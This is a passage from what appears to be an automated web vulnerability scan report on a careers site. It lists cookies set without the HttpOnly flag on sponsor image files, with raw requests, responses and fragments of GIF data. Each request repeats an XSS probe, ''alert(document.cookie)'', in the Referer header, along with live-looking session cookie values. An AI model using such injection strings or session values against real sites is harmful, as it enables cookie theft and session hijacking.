Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:35 GMT;path=/

GIF89a..H.......g[..........6&l.......x......................!.......,......H......I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v......xL...h.w.n...8jq....|C^......|4~.........3
.......1~
...[SNIP]...

10.180. http://www.vault.com/images/sponsors/schools/sponsor_2492.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_2492.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_2492.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 07 Jul 2009 17:57:26 GMT
ETag: "b486ee-500-5af7ad80"
Accept-Ranges: bytes
Content-Length: 1280
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:32 GMT;path=/

GIF89a..H................q..............Sy...................!.......,......H......I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z..,R..h..C..`......8.....G..k...`8.|
....}..z9ob.........c..~.6
...[SNIP]...

10.181. http://www.vault.com/images/sponsors/schools/sponsor_251.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_251.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_251.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:22:23 GMT
ETag: "b486e2-8e9-76fdd5c0"
Accept-Ranges: bytes
Content-Length: 2281
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:31 GMT;path=/

GIF89a..H..........*Ch.&U...Xk.u.....BVt.....0.8`."M..B....)]!.......,......H......G..8....`.I.h.h.....p,..l...Nyn..`.p..v....s..I.2.Z...C.Eh(...j*F-........(2\$8..jR...k~&.^.y.    mo."r...        .....Z    ....
...[SNIP]...

10.182. http://www.vault.com/images/sponsors/schools/sponsor_2983.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_2983.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_2983.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 21:45:42 GMT
ETag: "b4872e-573-4e1bcd80"
Accept-Ranges: bytes
Content-Length: 1395
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:32 GMT;path=/

GIF89a{.F.......111....mk............ggg.1/..................!.......,....{.F......I..8....`(.di.......p...3,.+.<.&. C.+.?...8....(euX8..%.)....A.;.z..Cne.6......c..{b...AVA.C@.Wq....M..    ......xb.mA.
...[SNIP]...

10.183. http://www.vault.com/images/sponsors/schools/sponsor_3276.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_3276.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_3276.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 21:47:57 GMT
ETag: "b4874b-671-5627bd40"
Accept-Ranges: bytes
Content-Length: 1649
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:31 GMT;path=/

GIF89a..H....................Rp.v.wwx...OPP...............!.......,......H......I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.N...6{P...0.D.S....qp......N...|....j.Y~@la...>.    .c....    .a~....B
...[SNIP]...

10.184. http://www.vault.com/images/sponsors/schools/sponsor_3672.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_3672.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_3672.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 07 Jul 2009 17:57:31 GMT
ETag: "b48730-b69-5b43f8c0"
Accept-Ranges: bytes
Content-Length: 2921
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:31 GMT;path=/

GIF89a..H..........#. $ !1-.?;<# !1./?<=LIJ[XYZWXhefvst...LJKZXYvtuhfg......)*.**.*+.**.67.77.78.77.DE.EE.EF.EE.QR.RR.RS.RR.__._`.mm.mm.zz.zz..................................lm.mn.z{.................
...[SNIP]...

10.185. http://www.vault.com/images/sponsors/schools/sponsor_507.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_507.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_507.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 07 Jul 2009 17:57:31 GMT
ETag: "b48753-a34-5b43f8c0"
Accept-Ranges: bytes
Content-Length: 2612
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:33 GMT;path=/

GIF89a..H...........ZZ....55.............##..................!.......,......H......I..8....`..di.h..l...({.c.x..|..@.aF.....r.l:...t.d...
..0....xL.....z].....|.h8...~...........qrXtz..............p.
...[SNIP]...

10.186. http://www.vault.com/images/sponsors/schools/sponsor_517.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_517.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_517.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 30 Jul 2010 17:22:23 GMT
ETag: "b48743-b7c-180bf1c0"
Accept-Ranges: bytes
Content-Length: 2940
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:33 GMT;path=/

GIF89a..H.............9b.b..Gl................u.....$Q~............Z|..........+W........Ds...z........2\......................~......5i...................Lz............q........Lq...................    
...[SNIP]...

10.187. http://www.vault.com/images/sponsors/schools/sponsor_790.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/schools/sponsor_790.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/schools/sponsor_790.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:22:23 GMT
ETag: "b48756-6df-76fdd5c0"
Accept-Ranges: bytes
Content-Length: 1759
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:31 GMT;path=/

GIF89a..H........dS...............5.w[..x...................q!.......,......H......I..t.b.d.@$.ff
..l..pl5I.(...Gp..Bo.,....!....D...."..,.q.U.V..k$@.....@.
..DJ.....^R=4+#.c...7.....7 U    ..
.. !.
...
...[SNIP]...

10.188. http://www.vault.com/images/sponsors/sponsor_1026.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_1026.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_1026.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 23 Jun 2009 11:04:42 GMT
ETag: "b48967-b46-f523c680"
Accept-Ranges: bytes
Content-Length: 2886
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:34 GMT;path=/

GIF89a..H....i..U....K;|.......t.....+q..e..........a.....4y.P...b.e..........Y}..I..l.u)...b.....Y..........)..r.......s.....Eg...w...=...r{n.....@..............=...\................n..Y.....x......
...[SNIP]...

10.189. http://www.vault.com/images/sponsors/sponsor_10358.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_10358.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_10358.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:23:08 GMT
ETag: "b48792-36a-79ac7b00"
Accept-Ranges: bytes
Content-Length: 874
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:35 GMT;path=/

GIF89a..H............H..$.....p......!.......,......H........0.I..8....`(.di.h..l..p,.tm.x..|....pH,....r.l:..C. ........
..*A.....q..u.....R...q. ....a|.n}..{.`n.~}...|.k.|..........}..{g....
......
...[SNIP]...

10.190. http://www.vault.com/images/sponsors/sponsor_10404.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_10404.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_10404.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 24 Jun 2009 12:45:53 GMT
ETag: "b48760-6eb-7cd74240"
Accept-Ranges: bytes
Content-Length: 1771
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:32 GMT;path=/

GIF89a..H............................./^.Hq............3`..........Iq....]....h..............u..............!.......,......H.... .di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.......x.....Sk
...[SNIP]...

10.191. http://www.vault.com/images/sponsors/sponsor_1815.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_1815.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_1815.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:27 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 18:24:51 GMT
ETag: "b48953-5cc-7fd022c0"
Accept-Ranges: bytes
Content-Length: 1484
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:31 GMT;path=/

GIF89a..H.............Q.....#e.......!.......,......H........0.I..8....`(.di.h..l..p,..@L..........+....`...x..N......#..i...3c......}..
..@...j..@....=yq.XV.h.~t...B..T.....F..._...@s...9.pj......
...[SNIP]...

10.192. http://www.vault.com/images/sponsors/sponsor_25318.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_25318.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_25318.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:28 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 09 Nov 2009 17:16:30 GMT
ETag: "b4875d-69d-5abdf780"
Accept-Ranges: bytes
Content-Length: 1693
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:32 GMT;path=/

GIF89a..H.......g...f..........7...p.${.......O..............!.......,......H......I..8....OA,.q..2$..mp,.t?..8...@ "..    ..B...9.....8....!.D..\.b..I..........;.`L.....>../i...."
=.\..
.a......v....s
...[SNIP]...

10.193. http://www.vault.com/images/sponsors/sponsor_377.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_377.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_377.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:26 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 23 Jun 2009 11:04:26 GMT
ETag: "b48767-47d-f42fa280"
Accept-Ranges: bytes
Content-Length: 1149
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:30 GMT;path=/

GIF89a..H.......U..U..U..>;;.**...HDE...XUUqnn.........a^^.......~hef.....................SPQ..................{xy..........................................NJK.....................O..............b...
...[SNIP]...

10.194. http://www.vault.com/images/sponsors/sponsor_385.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_385.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_385.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:31 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 23 Jun 2009 11:04:25 GMT
ETag: "b48900-651-f4206040"
Accept-Ranges: bytes
Content-Length: 1617
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:35 GMT;path=/

GIF89a..H................666iii...........................ggg......777~~~...qqq......;;;...QQQ___...!!!...........................MMMHHH...mmm...............tttfffIII......AAA...ZZZ...///EEE..........
...[SNIP]...

10.195. http://www.vault.com/images/sponsors/sponsor_43868.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_43868.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/sponsors/sponsor_43868.gif HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:26 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Sep 2009 19:23:21 GMT
ETag: "b4892e-805-51067c40"
Accept-Ranges: bytes
Content-Length: 2053
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: image/gif
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:30 GMT;path=/

GIF89a..H.........................6o..........`............En!.......,......H......I..8....`(.di....l......c?..8."...ah ...Q.1..|...v..:RS#    2,l...v[....y}.v..j...(...^..k..P"...).....
2e..j.DRj.~....\
...[SNIP]...

10.196. http://www.vault.com/images/sponsors/sponsor_569724.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /images/sponsors/sponsor_569724.gif

Issue detail

